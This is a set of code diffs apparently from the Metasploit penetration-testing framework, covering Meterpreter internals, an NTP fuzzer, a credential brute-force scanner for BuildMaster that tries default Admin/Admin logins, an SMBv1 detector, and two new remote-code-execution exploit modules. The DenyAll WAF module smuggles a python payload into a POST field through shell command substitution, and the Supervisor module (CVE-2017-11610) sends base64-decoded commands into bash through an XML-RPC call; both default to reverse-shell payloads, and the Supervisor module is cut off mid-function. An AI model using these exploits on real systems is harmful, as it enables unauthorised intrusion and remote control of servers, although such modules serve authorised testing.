print_error('Nothing to edit -- try using a module first.')
|
||||
end
|
||||
|
|
|
@ -34,24 +34,12 @@ module Meterpreter
|
|||
###
|
||||
class ClientCore < Extension
|
||||
|
||||
UNIX_PATH_MAX = 108
|
||||
DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
|
||||
|
||||
METERPRETER_TRANSPORT_SSL = 0
|
||||
METERPRETER_TRANSPORT_HTTP = 1
|
||||
METERPRETER_TRANSPORT_HTTPS = 2
|
||||
|
||||
TIMEOUT_SESSION = 24*3600*7 # 1 week
|
||||
TIMEOUT_COMMS = 300 # 5 minutes
|
||||
TIMEOUT_RETRY_TOTAL = 60*60 # 1 hour
|
||||
TIMEOUT_RETRY_WAIT = 10 # 10 seconds
|
||||
|
||||
VALID_TRANSPORTS = {
|
||||
'reverse_tcp' => METERPRETER_TRANSPORT_SSL,
|
||||
'reverse_http' => METERPRETER_TRANSPORT_HTTP,
|
||||
'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
|
||||
'bind_tcp' => METERPRETER_TRANSPORT_SSL
|
||||
}
|
||||
VALID_TRANSPORTS = [
|
||||
'reverse_tcp',
|
||||
'reverse_http',
|
||||
'reverse_https',
|
||||
'bind_tcp'
|
||||
]
|
||||
|
||||
include Rex::Payloads::Meterpreter::UriChecksum
|
||||
|
||||
|
@ -577,46 +565,12 @@ class ClientCore < Extension
|
|||
raise RuntimeError, 'Cannot migrate into current process', caller
|
||||
end
|
||||
|
||||
if client.platform == 'linux'
|
||||
if writable_dir.to_s.strip.empty?
|
||||
writable_dir = tmp_folder
|
||||
end
|
||||
|
||||
stat_dir = client.fs.filestat.new(writable_dir)
|
||||
|
||||
unless stat_dir.directory?
|
||||
raise RuntimeError, "Directory #{writable_dir} not found", caller
|
||||
end
|
||||
# Rex::Post::FileStat#writable? isn't available
|
||||
end
|
||||
|
||||
migrate_stub = generate_migrate_stub(target_process)
|
||||
migrate_payload = generate_migrate_payload(target_process)
|
||||
|
||||
# Build the migration request
|
||||
request = Packet.create_request('core_migrate')
|
||||
|
||||
if client.platform == 'linux'
|
||||
socket_path = File.join(writable_dir, Rex::Text.rand_text_alpha_lower(5 + rand(5)))
|
||||
|
||||
if socket_path.length > UNIX_PATH_MAX - 1
|
||||
raise RuntimeError, 'The writable dir is too long', caller
|
||||
end
|
||||
|
||||
pos = migrate_payload.index(DEFAULT_SOCK_PATH)
|
||||
|
||||
if pos.nil?
|
||||
raise RuntimeError, 'The meterpreter binary is wrong', caller
|
||||
end
|
||||
|
||||
migrate_payload[pos, socket_path.length + 1] = socket_path + "\x00"
|
||||
|
||||
ep = elf_ep(migrate_payload)
|
||||
request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000)
|
||||
request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep)
|
||||
request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib])
|
||||
end
|
||||
|
||||
request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid)
|
||||
request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length)
|
||||
request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib])
|
||||
|
@ -722,11 +676,8 @@ class ClientCore < Extension
|
|||
# Indicates if the given transport is a valid transport option.
|
||||
#
|
||||
def valid_transport?(transport)
|
||||
if transport
|
||||
VALID_TRANSPORTS.has_key?(transport.downcase)
|
||||
else
|
||||
false
|
||||
end
|
||||
return false if transport.nil?
|
||||
VALID_TRANSPORTS.include?(transport.downcase)
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -830,11 +781,11 @@ private
|
|||
opts[:lhost] = nil
|
||||
end
|
||||
|
||||
transport = VALID_TRANSPORTS[opts[:transport]]
|
||||
transport = opts[:transport].downcase
|
||||
|
||||
request = Packet.create_request(method)
|
||||
|
||||
scheme = opts[:transport].split('_')[1]
|
||||
scheme = transport.split('_')[1]
|
||||
url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
|
||||
|
||||
if opts[:luri] && opts[:luri].length > 0
|
||||
|
@ -864,7 +815,7 @@ private
|
|||
end
|
||||
|
||||
# do more magic work for http(s) payloads
|
||||
unless opts[:transport].ends_with?('tcp')
|
||||
unless transport.ends_with?('tcp')
|
||||
if opts[:uri]
|
||||
url << '/' unless opts[:uri].start_with?('/')
|
||||
url << opts[:uri]
|
||||
|
@ -878,7 +829,7 @@ private
|
|||
opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
|
||||
request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
|
||||
|
||||
if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert]
|
||||
if transport == 'reverse_https' && opts[:cert]
|
||||
hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert])
|
||||
request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
|
||||
end
|
||||
|
@ -902,24 +853,7 @@ private
|
|||
request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)
|
||||
request.add_tlv(TLV_TYPE_TRANS_URL, url)
|
||||
|
||||
return request
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Create a full migration payload specific to the target process.
|
||||
#
|
||||
def generate_migrate_payload(target_process)
|
||||
case client.platform
|
||||
when 'windows'
|
||||
blob = generate_migrate_windows_payload(target_process)
|
||||
when 'linux'
|
||||
blob = generate_migrate_linux_payload
|
||||
else
|
||||
raise RuntimeError, "Unsupported platform '#{client.platform}'"
|
||||
end
|
||||
|
||||
blob
|
||||
request
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -945,34 +879,18 @@ private
|
|||
end
|
||||
|
||||
#
|
||||
# Create a full Linux-specific migration payload specific to the target process.
|
||||
# Create a full migration payload specific to the target process.
|
||||
#
|
||||
def generate_migrate_linux_payload
|
||||
MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
|
||||
def generate_migrate_payload(target_process)
|
||||
case client.platform
|
||||
when 'windows'
|
||||
blob = generate_migrate_windows_payload(target_process)
|
||||
else
|
||||
raise RuntimeError, "Unsupported platform '#{client.platform}'"
|
||||
end
|
||||
|
||||
#
|
||||
# Determine the elf entry poitn for the given payload.
|
||||
#
|
||||
def elf_ep(payload)
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
ep = elf.elf_header.e_entry
|
||||
return ep
|
||||
blob
|
||||
end
|
||||
|
||||
#
|
||||
# Get the tmp folder for the session.
|
||||
#
|
||||
def tmp_folder
|
||||
tmp = client.sys.config.getenv('TMPDIR')
|
||||
|
||||
if tmp.to_s.strip.empty?
|
||||
tmp = '/tmp'
|
||||
end
|
||||
|
||||
tmp
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end; end; end
|
||||
|
|
|
@ -170,10 +170,7 @@ class Config
|
|||
ret = []
|
||||
res = client.send_request(req)
|
||||
res.each(TLV_TYPE_PRIVILEGE) do |p|
|
||||
ret << {
|
||||
priv: p.get_tlv_value(TLV_TYPE_PRIVILEGE_NAME),
|
||||
enabled: p.get_tlv_value(TLV_TYPE_PRIVILEGE_ENABLED),
|
||||
}
|
||||
ret << p.value
|
||||
end
|
||||
ret
|
||||
end
|
||||
|
|
|
@ -16,9 +16,7 @@ TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600
|
|||
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
|
||||
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630
|
||||
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631
|
||||
TLV_TYPE_PRIVILEGE = TLV_META_TYPE_GROUP | 632
|
||||
TLV_TYPE_PRIVILEGE_NAME = TLV_META_TYPE_STRING | 633
|
||||
TLV_TYPE_PRIVILEGE_ENABLED = TLV_META_TYPE_BOOL | 634
|
||||
TLV_TYPE_PRIVILEGE = TLV_META_TYPE_STRING | 632
|
||||
|
||||
##
|
||||
#
|
||||
|
|
|
@ -757,7 +757,7 @@ class Console::CommandDispatcher::Core
|
|||
# Arguments for transport switching
|
||||
#
|
||||
@@transport_opts = Rex::Parser::Arguments.new(
|
||||
'-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}"],
|
||||
'-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.join(', ')}"],
|
||||
'-l' => [true, 'LHOST parameter (for reverse transports)'],
|
||||
'-p' => [true, 'LPORT parameter'],
|
||||
'-i' => [true, 'Specify transport by index (currently supported: remove)'],
|
||||
|
|
|
@ -899,12 +899,12 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
'Header' => 'Enabled Process Privileges',
|
||||
'Indent' => 0,
|
||||
'SortIndex' => 1,
|
||||
'Columns' => ['Priv Name', 'Enabled']
|
||||
'Columns' => ['Name']
|
||||
)
|
||||
|
||||
privs = client.sys.config.getprivs
|
||||
client.sys.config.getprivs.each do |priv|
|
||||
table << [priv[:priv], priv[:enabled].to_s]
|
||||
table << [priv]
|
||||
end
|
||||
|
||||
print_line
|
||||
|
|
|
@ -191,9 +191,9 @@ class Client
|
|||
# Closes the connection to the remote server.
|
||||
#
|
||||
def close
|
||||
if (self.conn)
|
||||
if self.conn && !self.conn.closed?
|
||||
self.conn.shutdown
|
||||
self.conn.close unless self.conn.closed?
|
||||
self.conn.close
|
||||
end
|
||||
|
||||
self.conn = nil
|
||||
|
|
|
@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
|
|||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.3.7'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.3.8'
|
||||
# Needed for the next-generation POSIX Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2'
|
||||
# Needed by msfgui and other rpc components
|
||||
|
|
|
@ -98,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
@versions.each do |version|
|
||||
print_status("#{host}:#{rport} fuzzing version #{version} control messages (mode 6)")
|
||||
@mode_6_operations.each do |op|
|
||||
request = Rex::Proto::NTP.ntp_control(version, op)
|
||||
request = Rex::Proto::NTP.ntp_control(version, op).to_binary_s
|
||||
what = "#{request.size}-byte version #{version} mode 6 op #{op} message"
|
||||
vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}")
|
||||
responses = probe(host, datastore['RPORT'].to_i, request)
|
||||
|
@ -114,7 +114,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
print_status("#{host}:#{rport} fuzzing version #{version} private messages (mode 7)")
|
||||
@mode_7_implementations.each do |implementation|
|
||||
@mode_7_request_codes.each do |request_code|
|
||||
request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188)
|
||||
request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188).to_binary_s
|
||||
what = "#{request.size}-byte version #{version} mode 7 imp #{implementation} req #{request_code} message"
|
||||
vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}")
|
||||
responses = probe(host, datastore['RPORT'].to_i, request)
|
||||
|
@ -164,6 +164,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
# TODO: is there a better way to pick this size? Should more than one be tried?
|
||||
request.payload = SecureRandom.random_bytes(16)
|
||||
end
|
||||
request = request.to_binary_s
|
||||
what = "#{request.size}-byte #{short ? 'short ' : nil}version #{version} mode #{mode} message"
|
||||
vprint_status("#{host}:#{rport} probing with #{what}")
|
||||
responses = probe(host, datastore['RPORT'].to_i, request)
|
||||
|
|
|
@ -30,10 +30,10 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(443),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true]),
|
||||
OptString.new('SSLVersion', [true, 'SSL version', 'TLS1']),
|
||||
OptString.new('TARGETURI', [ true, "Base directory path", '/']),
|
||||
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),
|
||||
])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -0,0 +1,96 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::AuthBrute
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Inedo BuildMaster Login Scanner',
|
||||
'Description' => %{
|
||||
This module will attempt to authenticate to BuildMaster. There is a default user 'Admin'
|
||||
which has the default password 'Admin'.
|
||||
},
|
||||
'Author' => [ 'James Otten <jamesotten1[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'DefaultOptions' => { 'VERBOSE' => true })
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(81),
|
||||
OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']),
|
||||
OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
return unless buildmaster?
|
||||
|
||||
each_user_pass do |user, pass|
|
||||
do_login(user, pass)
|
||||
end
|
||||
end
|
||||
|
||||
def buildmaster?
|
||||
begin
|
||||
res = send_request_cgi('uri' => '/log-in')
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
|
||||
print_error("#{peer} - HTTP Connection Failed")
|
||||
return false
|
||||
end
|
||||
|
||||
if res && res.code == 200 && res.body.include?('BuildMaster_Version')
|
||||
version = res.body.scan(%r{<span id="BuildMaster_Version">(.*)</span>}).flatten.first
|
||||
print_good("#{peer} - Identified BuildMaster #{version}")
|
||||
return true
|
||||
else
|
||||
print_error("#{peer} - Application does not appear to be BuildMaster")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
def login_succeeded?(res)
|
||||
if res && res.code == 200
|
||||
body = JSON.parse(res.body)
|
||||
return body.key?('succeeded') && body['succeeded']
|
||||
end
|
||||
false
|
||||
rescue
|
||||
false
|
||||
end
|
||||
|
||||
def do_login(user, pass)
|
||||
print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn',
|
||||
'method' => 'POST',
|
||||
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
|
||||
'vars_post' =>
|
||||
{
|
||||
'userName' => user,
|
||||
'password' => pass
|
||||
}
|
||||
}
|
||||
)
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
|
||||
vprint_error("#{peer} - HTTP Connection Failed...")
|
||||
return :abort
|
||||
end
|
||||
|
||||
if login_succeeded?(res)
|
||||
print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
|
||||
store_valid_credential(user: user, private: pass)
|
||||
else
|
||||
print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
|
||||
end
|
||||
end
|
||||
end
|
|
@ -22,14 +22,9 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(1241),
|
||||
OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
|
||||
])
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]),
|
||||
OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"])
|
||||
])
|
||||
OptBool.new('BLANK_PASSWORDS', "Try blank passwords for all users")
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
|
|
@ -20,13 +20,8 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(9390),
|
||||
OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
|
||||
])
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]),
|
||||
OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"])
|
||||
])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
|
|
@ -20,13 +20,8 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(9391),
|
||||
OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
|
||||
])
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]),
|
||||
OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"])
|
||||
])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
|
|
@ -0,0 +1,76 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
# Exploit mixins should go first
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
# Aliases for common classes
|
||||
SIMPLE = Rex::Proto::SMB::SimpleClient
|
||||
XCEPT = Rex::Proto::SMB::Exceptions
|
||||
CONST = Rex::Proto::SMB::Constants
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'SMBv1 Protocol Detection',
|
||||
'Description' => 'Detect systems that support the SMBv1 protocol',
|
||||
'Author' => 'Chance Johnson @loftwing',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options([ Opt::RPORT(445) ])
|
||||
end
|
||||
|
||||
# Modified from smb2 module by @hdm
|
||||
# Fingerprint a single host
|
||||
def run_host(ip)
|
||||
begin
|
||||
connect
|
||||
|
||||
# Only accept NT LM 0.12 dialect and WfW3.0
|
||||
dialects = ['PC NETWORK PROGRAM 1.0',
|
||||
'LANMAN1.0',
|
||||
'Windows for Workgroups 3.1a',
|
||||
'LM1.2X002',
|
||||
'LANMAN2.1',
|
||||
'NT LM 0.12']
|
||||
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
|
||||
|
||||
pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
|
||||
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
|
||||
pkt['Payload']['SMB'].v['Flags1'] = 0x08
|
||||
pkt['Payload']['SMB'].v['Flags2'] = 0xc801
|
||||
pkt['Payload'].v['Payload'] = data
|
||||
|
||||
pkt['Payload']['SMB'].v['ProcessID'] = rand(0x10000)
|
||||
pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000)
|
||||
|
||||
sock.put(pkt.to_s)
|
||||
res = sock.get_once
|
||||
# expecting \xff instead of \xfe
|
||||
if res && res.index("\xffSMB")
|
||||
print_good("#{ip} supports SMBv1 dialect.")
|
||||
report_note(
|
||||
host: ip,
|
||||
proto: 'tcp',
|
||||
sname: 'smb1',
|
||||
port: rport,
|
||||
type: "supports SMB 1"
|
||||
)
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
rescue EOFError
|
||||
rescue Errno::ECONNRESET
|
||||
rescue ::Exception => e
|
||||
print_error("#{rhost}: #{e.class} #{e} #{e.backtrace}")
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
end
|
|
@ -124,11 +124,15 @@ class MetasploitModule < Msf::Auxiliary
|
|||
)
|
||||
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
|
||||
print_error("A network issue has occurred: #{e.message}")
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
rescue Timeout::Error
|
||||
print_error("#{target_host}:#{rport} Timed out after #{to} seconds")
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
rescue ::Exception => e
|
||||
print_error("#{target_host}:#{rport} Error: #{e} #{e.backtrace}")
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
|
|
@ -0,0 +1,103 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "DenyAll Web Application Firewall Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
|
||||
terminal command under the context of the web server user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'RPORT' => 3001,
|
||||
'Payload' => 'python/meterpreter/reverse_tcp'
|
||||
},
|
||||
'Platform' => ['python'],
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Sep 19 2017",
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def get_token
|
||||
# Taking token by exploiting bug on first endpoint.
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
|
||||
'vars_get' => {
|
||||
'applianceUid' => 'LOCALUID',
|
||||
'typeOf' => 'debug'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body.include?("iToken")
|
||||
res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
# If we've managed to get token, that means target is most likely vulnerable.
|
||||
token = get_token
|
||||
if token.nil?
|
||||
Exploit::CheckCode::Safe
|
||||
else
|
||||
Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Get iToken from unauthenticated accessible endpoint
|
||||
print_status('Extracting iToken value')
|
||||
token = get_token
|
||||
|
||||
if token.nil?
|
||||
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
|
||||
else
|
||||
print_good("Awesome. iToken value = #{token}")
|
||||
end
|
||||
|
||||
# Accessing to the vulnerable second endpoint where we have command injection with valid iToken
|
||||
print_status('Trigerring command injection vulnerability with iToken value.')
|
||||
r = rand_text_alpha(5 + rand(3));
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
|
||||
'vars_post' => {
|
||||
'iToken' => token,
|
||||
'tag' => 'tunnel',
|
||||
'stime' => r,
|
||||
'type' => "#{r}$(python -c \"#{payload.encoded}\")"
|
||||
}
|
||||
})
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,169 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Supervisor XML-RPC Authenticated Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Supervisor process control software, where an authenticated client
|
||||
can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.
|
||||
The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this
|
||||
may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been
|
||||
configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Calum Hutton <c.e.hutton@gmx.com>'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
|
||||
['URL', 'https://www.debian.org/security/2017/dsa-3942'],
|
||||
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'],
|
||||
['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
|
||||
['CVE', '2017-11610']
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Targets' =>
|
||||
[
|
||||
['3.0a1-3.3.2', {}]
|
||||
],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'RPORT' => 9001,
|
||||
'Payload' => 'linux/x64/meterpreter/reverse_tcp',
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Jul 19 2017',
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9001),
|
||||
OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),
|
||||
OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),
|
||||
OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def check_version(version)
|
||||
if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
|
||||
print_status('Extracting version from web interface..')
|
||||
|
||||
params = {
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri('/')
|
||||
}
|
||||
if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
|
||||
print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
|
||||
params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
|
||||
end
|
||||
res = send_request_cgi(params)
|
||||
|
||||
if res
|
||||
if res.code == 200
|
||||
match = res.body.match(/<span>(\d+\.[\dab]\.\d+)<\/span>/)
|
||||
if match
|
||||
version = Gem::Version.new(match[1])
|
||||
if check_version(version)
|
||||
print_good("Vulnerable version found: #{version}")
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
print_bad("Version #{version} is not vulnerable")
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
else
|
||||
print_bad('Could not extract version number from web interface')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
elsif res.code == 401
|
||||
print_bad("Authentication failed: #{res.code} response")
|
||||
return Exploit::CheckCode::Safe
|
||||
else
|
||||
print_bad("Unexpected HTTP code: #{res.code} response")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
else
|
||||
print_bad('Error connecting to web interface')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
||||
# XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server
|
||||
# Credit to the following urls for the os.system() payload
|
||||
# https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610
|
||||
# https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
|
||||
xml_payload = %{<?xml version="1.0"?>
|
||||
<methodCall>
|
||||
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
|
||||
<params>
|
||||
<param>
|
||||
<string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 &</string>
|
||||
</param>
|
||||
</params>
|
||||
</methodCall>}
|
||||
|
||||
# Send the XML-RPC payload via POST to the specified endpoint
|
||||
endpoint_path = target_uri.path
|
||||
print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}")
|
||||
|
||||
params = {
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(endpoint_path),
|
||||
'ctype' => 'text/xml',
|
||||
'headers' => {'Accept' => 'text/xml'},
|
||||
'data' => xml_payload,
|
||||
'encode_params' => false
|
||||
}
|
||||
if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
|
||||
